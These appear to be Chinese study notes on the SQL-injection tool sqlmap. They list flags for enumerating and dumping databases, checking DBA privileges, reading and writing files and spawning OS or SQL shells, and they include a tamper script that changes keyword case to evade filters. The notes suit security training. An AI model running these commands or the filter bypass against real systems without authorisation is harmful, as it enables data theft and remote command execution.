注入工具SQLMAPTamper 编写指纹修改高权限操作目录架构
#
参考:
https://www.cnblogs.com/bmjoker/p/9326258.html
#
数据猜解
-
库表列数据
&
字典
测试:
http://vulnweb.com/
--current-db
--tables -D ""
--columns -T "" -D ""
--dump -C "" -C "" -T ""
#
权限操作
-
文件
&
命令
&
交互式
测试:
MYSQL
高权限注入
引出权限:
--is-dba --privileges
引出文件:
--file-read --file-write --file-dest
引出命令:
--os-cmd= --os-shell --sql-shell
#
提交方法
-POST&HEAD&JSON
测试:
Post Cookie Json
--data ""
--cookie ""
-r 1.txt

如果是json模式的话 就把数据包放在文件 然后对这文件进行注入
#
绕过模块
-Tamper
脚本
-
使用
&
开发
测试:
base64
注入 有过滤的注入
--tamper=base64encode.py
--tamper=test.py
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass(遇到过滤 发现如何绕过 然后·写脚本 再用sqlmap)
def tamper(payload, **kwargs):
if payload:
payload = payload.replace('SELECT','sElEct')
payload = payload.replace('OR','Or')
payload = payload.replace('AND','And')
payload = payload.replace('SLEEP','SleeP')....
